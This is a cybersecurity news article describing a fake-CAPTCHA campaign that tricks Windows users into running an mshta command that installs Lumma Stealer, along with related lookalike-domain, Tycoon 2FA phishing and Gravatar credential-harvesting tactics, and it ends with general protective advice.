A new cyber threat is targeting industries worldwide using fake CAPTCHA pages. This campaign distributes the Lumma Stealer malware, a tool that steals sensitive information. It has impacted industries like healthcare, banking, and telecom. Security experts warn organizations to remain vigilant as these attacks grow more sophisticated.
The Malware Campaign and Its Global Reach
This malicious campaign uses deceptive CAPTCHA checks to trick victims. When users visit a compromised website, they encounter a fake CAPTCHA page. It instructs them to execute commands on their Windows systems, leading to malware installation.
This campaign is active in countries such as Argentina, Colombia, the United States, and the Philippines. The attackers target multiple industries, including healthcare, banking, marketing, and telecom. The telecom sector has been hit the hardest.
How the Attack Works
The attack chain begins when users land on a compromised website. From there, they are redirected to a fake CAPTCHA page. The page asks users to run a command using mshta.exe, a Windows tool.
This command downloads and runs a malicious HTA file from a remote server. This file initiates further actions using PowerShell scripts. The scripts unpack more scripts to decode and load the Lumma Stealer malware.
The attackers also bypass Windows Antimalware Scan Interface (AMSI) to evade detection. This technique avoids browser-based defenses by making users perform the necessary steps outside their browsers.
Also read | Malvertising Attack Hijacks Google Ads Users Steals Credentials
The Lumma Stealer Malware
Lumma Stealer is a powerful malware that operates as Malware-as-a-Service (MaaS). This means cybercriminals can rent or buy it to launch attacks. The malware has been very active in recent months.
Attackers use different methods to deliver Lumma Stealer. These methods make detection and blocking much harder for security systems.
Fake Domains and New Delivery Methods
Attackers also use fake domains to spread Lumma Stealer. They set up domains impersonating legitimate websites like Reddit and WeTransfer. Users visiting these fake domains are tricked into downloading password-protected archives.
These archive files contain malware droppers that execute Lumma Stealer. Researchers have identified over 1,000 counterfeit domains being used this way.
A similar method was used earlier in 2023. Attackers created over 1,300 fake domains impersonating AnyDesk to distribute Vidar Stealer malware.
Also read | Google OAuth Vulnerability Exposes Millions via Failed Startup Domains
Advanced Tactics in Phishing-as-a-Service (PhaaS)
Another related threat is the Tycoon 2FA toolkit, a phishing toolkit. Cybercriminals use it to make phishing attacks more effective.
This toolkit includes advanced features to bypass security measures. It uses real, often compromised, email accounts to send phishing emails. It can detect automated security scans and block right-click menus.
Social Engineering via Gravatar
Attackers are also using Gravatar profiles to launch credential-harvesting attacks. Gravatar is a legitimate avatar service, but cybercriminals exploit it to create fake profiles. These profiles mimic services like AT&T, Comcast, Proton Mail, and others.
These fake profiles look convincing and trick users into sharing their login details. This adds another layer of deception to their attacks.
Also read | AI-Powered Ransomware FunkSec Hits 85 Victims Globally
Why This Campaign Is Dangerous
This campaign is highly dangerous because it combines multiple techniques. It uses fake CAPTCHA pages, phishing tactics, and fake domains. These methods make it harder for victims to spot and for security tools to detect.
The use of Malware-as-a-Service further complicates the situation. It allows attackers with little technical knowledge to launch sophisticated attacks.
How to Protect Yourself and Your Organization
Avoid running commands from untrusted websites or CAPTCHA pages.
- Keep your antivirus and operating systems updated.
- Educate your employees about phishing and social engineering tactics.
- Use email filtering tools to block phishing attempts.
- Monitor your network for unusual activity.
Also read | Double Clickjacking: New “Double-Click” Attack to Hack Websites
Conclusion
The fake CAPTCHA campaign is a reminder of how cyber threats are evolving. Attackers now use sophisticated techniques to trick users and evade detection. Organizations must strengthen their cybersecurity measures to stay protected.